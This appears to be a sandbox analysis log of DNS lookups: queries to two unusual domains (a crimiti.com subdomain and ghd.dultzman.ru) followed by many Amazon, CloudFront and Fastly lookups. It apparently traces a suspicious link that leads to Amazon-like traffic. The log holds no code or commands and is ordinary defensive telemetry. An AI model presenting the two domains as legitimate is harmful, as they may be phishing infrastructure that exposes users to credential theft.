                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.905076027 CEST1.1.1.1192.168.2.50x66f9No error (0)7czh8.crimiti.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:34.905076027 CEST1.1.1.1192.168.2.50x66f9No error (0)7czh8.crimiti.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.397172928 CEST1.1.1.1192.168.2.50xf11aNo error (0)ghd.dultzman.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.397172928 CEST1.1.1.1192.168.2.50xf11aNo error (0)ghd.dultzman.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.402760029 CEST1.1.1.1192.168.2.50x89c5No error (0)ghd.dultzman.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:36.529752016 CEST1.1.1.1192.168.2.50xa5acNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.241316080 CEST1.1.1.1192.168.2.50x43beNo error (0)dlsq0ztllwnya.cloudfront.net52.222.236.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.258615971 CEST1.1.1.1192.168.2.50x7fffNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.258615971 CEST1.1.1.1192.168.2.50x7fffNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.272595882 CEST1.1.1.1192.168.2.50x2ea9No error (0)ghd.dultzman.ru65IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.346597910 CEST1.1.1.1192.168.2.50xe839No error (0)ghd.dultzman.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:39.346597910 CEST1.1.1.1192.168.2.50xe839No error (0)ghd.dultzman.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.453107119 CEST1.1.1.1192.168.2.50xd56No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.453107119 CEST1.1.1.1192.168.2.50xd56No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.453107119 CEST1.1.1.1192.168.2.50xd56No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.453107119 CEST1.1.1.1192.168.2.50xd56No error (0)c.media-amazon.com18.239.99.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454478979 CEST1.1.1.1192.168.2.50x151eNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454539061 CEST1.1.1.1192.168.2.50xafebNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454539061 CEST1.1.1.1192.168.2.50xafebNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.454539061 CEST1.1.1.1192.168.2.50xafebNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.455003977 CEST1.1.1.1192.168.2.50xcf5No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.455003977 CEST1.1.1.1192.168.2.50xcf5No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.455003977 CEST1.1.1.1192.168.2.50xcf5No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.455003977 CEST1.1.1.1192.168.2.50xcf5No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:40.457281113 CEST1.1.1.1192.168.2.50x535No error (0)completion.amazon.com44.215.128.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.222186089 CEST1.1.1.1192.168.2.50x4011No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.222186089 CEST1.1.1.1192.168.2.50x4011No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.222186089 CEST1.1.1.1192.168.2.50x4011No error (0)c.media-amazon.com18.239.85.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.222805977 CEST1.1.1.1192.168.2.50x5e69No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.222805977 CEST1.1.1.1192.168.2.50x5e69No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.782983065 CEST1.1.1.1192.168.2.50x9b6dNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.782983065 CEST1.1.1.1192.168.2.50x9b6dNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.782983065 CEST1.1.1.1192.168.2.50x9b6dNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.782983065 CEST1.1.1.1192.168.2.50x9b6dNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:41.783133984 CEST1.1.1.1192.168.2.50x7f80No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340312958 CEST1.1.1.1192.168.2.50x3f1cNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340312958 CEST1.1.1.1192.168.2.50x3f1cNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340312958 CEST1.1.1.1192.168.2.50x3f1cNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.147.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.250.171.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.243.152.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.247.241.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com176.34.141.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.216.251.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.14.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.340327978 CEST1.1.1.1192.168.2.50xca9aNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.64.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.564596891 CEST1.1.1.1192.168.2.50xe8b6No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.564596891 CEST1.1.1.1192.168.2.50xe8b6No error (0)aax-eu-retail-direct.amazon-adsystem.com52.95.121.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.565581083 CEST1.1.1.1192.168.2.50xbe49No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835313082 CEST1.1.1.1192.168.2.50x2451No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835313082 CEST1.1.1.1192.168.2.50x2451No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835313082 CEST1.1.1.1192.168.2.50x2451No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835313082 CEST1.1.1.1192.168.2.50x2451No error (0)c.media-amazon.com18.239.24.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835328102 CEST1.1.1.1192.168.2.50x8761No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835328102 CEST1.1.1.1192.168.2.50x8761No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835328102 CEST1.1.1.1192.168.2.50x8761No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:42.835328102 CEST1.1.1.1192.168.2.50x8761No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098494053 CEST1.1.1.1192.168.2.50x5112No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098696947 CEST1.1.1.1192.168.2.50xd680No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.098696947 CEST1.1.1.1192.168.2.50xd680No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.2.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.32.176.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.220.196.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.112.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.243.152.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.246.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.252.148.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.149995089 CEST1.1.1.1192.168.2.50xd098No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.64.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.152731895 CEST1.1.1.1192.168.2.50xe6b4No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.152731895 CEST1.1.1.1192.168.2.50xe6b4No error (0)aax-eu-retail-direct.amazon-adsystem.com52.94.222.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.155030012 CEST1.1.1.1192.168.2.50x95e8No error (0)aax-eu.amazon.aeaax-eu-retail-direct.amazon-adsystem.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.158363104 CEST1.1.1.1192.168.2.50xa8deNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.158363104 CEST1.1.1.1192.168.2.50xa8deNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:44.158363104 CEST1.1.1.1192.168.2.50xa8deNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.235146999 CEST1.1.1.1192.168.2.50x1262No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.236608982 CEST1.1.1.1192.168.2.50xcf9aNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:45.236608982 CEST1.1.1.1192.168.2.50xcf9aNo error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.467216015 CEST1.1.1.1192.168.2.50xb4b2Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.641505957 CEST1.1.1.1192.168.2.50xf31dNo error (0)unagi-eu.amazon.com67.220.226.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.199.181.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.133.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.139.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.138.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.133.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.129.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.132.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.675101995 CEST1.1.1.1192.168.2.50x7eb4No error (0)unagi-na.amazon.com44.215.130.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:52.678101063 CEST1.1.1.1192.168.2.50x56aNo error (0)aax-eu.amazon-adsystem.com54.239.33.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.983874083 CEST1.1.1.1192.168.2.50xd494No error (0)aax-eu.amazon-adsystem.com52.95.125.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.988693953 CEST1.1.1.1192.168.2.50xedf3No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.990459919 CEST1.1.1.1192.168.2.50xcf04No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.990459919 CEST1.1.1.1192.168.2.50xcf04No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:53.990459919 CEST1.1.1.1192.168.2.50xcf04No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.519721031 CEST1.1.1.1192.168.2.50x9c71No error (0)aax-eu.amazon-adsystem.com67.220.228.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Aug 21, 2024 20:28:55.521384001 CEST1.1.1.1192.168.2.50xcab5No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
